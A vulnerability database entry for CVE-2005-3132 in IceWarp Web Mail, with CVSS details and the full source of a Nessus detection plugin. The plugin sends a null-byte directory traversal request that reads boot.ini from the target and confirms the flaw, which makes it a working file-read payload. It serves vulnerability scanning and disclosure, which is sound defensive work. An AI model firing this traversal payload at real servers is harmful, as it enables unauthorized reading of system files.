Vulnerabilities > CVE-2005-3132 - Information Disclosure vulnerability in Web Mail

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
icewarp
merak
nessus

Summary

MERAK Mail Server 8.2.4r with Icewarp Web Mail 5.5.1, and possibly earlier versions, allows remote attackers to obtain sensitive information via a direct request to bwlist_inc.html, which reveals the path in an error message.

Vulnerable Configurations

Part Description Count
Application
Icewarp
1
Application
Merak
1

Nessus

NASL familyCGI abuses
NASL idICEWARP_WEBMAIL_VULNS4.NASL
descriptionThe remote host is running IceWarp Web Mail - a webmail solution available for the Microsoft Windows platform. The remote version of this software is affected by a directory traversal vulnerability that may allow an attacker to retrieve arbitrary files on the system. Another input validation flaw allows an attacker to delete arbitrary files on the remote host. Note this flaw indicates IceWarp is vulnerable to cross-site scripting attacks too.
last seen2020-06-01
modified2020-06-02
plugin id19784
published2005-09-30
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/19784
titleIceWarp Web Mail Multiple Flaws (4)
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(19784);
 script_version("1.19");
 script_cvs_date("Date: 2018/11/15 20:50:17");

 script_cve_id("CVE-2005-3131", "CVE-2005-3132", "CVE-2005-3133");
 script_bugtraq_id(14988, 14986, 14980);

 script_name(english:"IceWarp Web Mail Multiple Flaws (4)");
 script_summary(english:"Check the version of IceWarp WebMail");

 script_set_attribute(attribute:"synopsis", value:
"It is possible to retrieve/delete local files on the remote system
through the webmail service." );
 script_set_attribute(attribute:"description", value:
"The remote host is running IceWarp Web Mail - a webmail solution
available for the Microsoft Windows platform. 

The remote version of this software is affected by a directory
traversal vulnerability that may allow an attacker to retrieve
arbitrary files on the system. 

Another input validation flaw allows an attacker to delete arbitrary
files on the remote host. 

Note this flaw indicates IceWarp is vulnerable to cross-site scripting
attacks too." );
 script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=112810385104168&w=2" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:P/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

 script_set_attribute(attribute:"plugin_publication_date", value: "2005/09/30");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/09/30");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:icewarp:webmail");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

 script_dependencie("icewarp_webmail_vulns.nasl");
 script_require_ports("Services/www", 32000);
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:32000);

version = get_kb_item("www/" + port + "/icewarp_webmail/version");
if ( ! version ) exit(0);

u = "/accounts/help.html?helpid=../../../../../../../../../../../../boot.ini%00";

w = http_send_recv3(method:"GET", item:u, port:port);
if (isnull(w)) exit(0);
r = w[2];

r = strstr (r, "[boot loader]");
if (isnull(r)) exit (0);

report = string ("It was possible to retrieve the file boot.ini :\n\n",	r);

security_hole (port:port, extra: report);
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);